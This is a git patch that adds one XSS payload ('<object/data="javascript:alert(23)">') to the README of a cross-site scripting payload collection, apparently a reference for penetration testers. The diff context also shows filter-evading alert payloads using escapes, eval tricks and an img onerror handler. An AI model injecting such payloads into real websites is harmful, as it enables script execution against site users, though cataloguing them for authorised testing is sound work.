From 7369ee28b31d84a2d895d6ec87cb154bb7994b74 Mon Sep 17 00:00:00 2001 From: Lorenzo Grazian <30753137+looCiprian@users.noreply.github.com> Date: Thu, 2 Sep 2021 15:14:29 +0200 Subject: [PATCH] Added XSS <object> payload --- XSS Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 92ccfa7..a1ae92c 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks: <script>\u0061lert('22')</script> <script>eval('\x61lert(\'33\')')</script> <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" +<object/data="javascript:alert(23)"> // Img payload <img src=x onerror=alert('XSS');>